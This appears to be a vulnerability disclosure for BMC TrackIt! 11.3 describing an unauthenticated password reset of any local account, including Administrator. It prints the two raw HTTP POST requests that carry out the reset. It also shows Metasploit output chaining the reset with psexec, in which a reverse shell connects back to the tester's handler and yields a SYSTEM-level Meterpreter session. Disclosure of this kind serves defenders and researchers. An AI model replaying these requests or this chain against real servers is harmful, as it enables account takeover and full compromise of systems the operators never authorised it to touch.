BMC TrackIt! 11.3 Unauthenticated Local User Password Change Trial available here: http://www.trackit.com A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359 BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated user to change any local user's password, such as Administrator. If the ability to log in remotely via SMB is enabled on the server, this can yield an unauthenticated user a shell of SYSTEM using the psexec module in Metasploit. This was tested against Windows Server 2008 R2 in a relatively default (trackit installs SQL server) installation. A domain was set up and the web server was added to the domain. Domain credentials were not able to be set, only local users. Using the Registration link in the top right of the /PasswordReset/Application/Main page, the UI requires the user's password to continue. However, the request made after to actually register the local user is disparate from the authentication request and can be sent independently. This allows an unauthenticated user to now reset that user's password. Because the Password Reset form makes a separate distinct request to check the answers to the secret question, the request to actually change a user's password can be made as any user. The first request looks like: POST /PasswordReset/Application/Register HTTP/1.1 Host: 192.168.1.57 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.57/PasswordReset Content-Length: 318 Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot Connection: keep-alive Pragma: no-cache Cache-Control: no-cache domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd% 40fdsafdsa.com &userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/ and using the subsequent Set-Cookie in all subsequent requests as the cookie. The domainname parameter can the the name of the computer, which is the default value on the registration page. The userName parameter is the user to register with the application. You can attempt this is with a user already registered with no issue (though probably changing the secret answers to known values is probably bad too). The second request looks like this: POST /PasswordReset/Application/ResetPassword HTTP/1.1 Host: 192.168.1.57 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.1.57/PasswordReset/Application/Main Content-Length: 92 Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator Connection: keep-alive Pragma: no-cache Cache-Control: no-cache newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true The domain and UserName parameters should match those supplied in the previous registration request. The newPassword parameter will need to meet any local standard enforced by GPO. Combining these two requests will allow an unauthorised user to register a local user to be elegible for a password reset via the password reset form, then take advantage of the subsequent password reset vulnerability to change the password of any local user, including Administrator. Supplied is a metasploit auxiliary module which will change the password of the Administrator user by default, then print the domain, username, and password to user with psexec in order to log in over SMB. The below Metasploit run details changing the password with the attached module. Setting the password to the one reported by the auxiliary module, psexec is run again and a shell as NT USER/SYSTEM is gained. msf auxiliary(bmc_trackit_pwd_reset) > show options Module options (auxiliary/gather/bmc_trackit_pwd_reset): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN no The domain of the user. By default the local user's computer name will be autodetected LOCALUSER Administrator yes The local user to change password for Proxies no Use a proxy chain RHOST 192.168.1.57 yes The target address RPORT 80 yes The target port TARGETURI / yes The path to BMC TrackIt VHOST no HTTP server virtual host msf auxiliary(bmc_trackit_pwd_reset) > run [*] Please run the psexec module using: [*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1 [*] Auxiliary module execution completed msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec msf exploit(psexec) > msf exploit(psexec) > set SMBPass qGSvnJeuNO!1 SMBPass => qGSvnJeuNO!1 msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.1.31:4444 [*] Connecting to the server... [*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \fNRBQEMV.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.57[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (NOAlMwJR - "MBvX")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \fNRBQEMV.exe... [*] Sending stage (769024 bytes) to 192.168.1.57 [*] Meterpreter session 4 opened (192.168.1.31:4444 -> 192.168.1.57:50668) at 2014-10-12 00:44:12 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website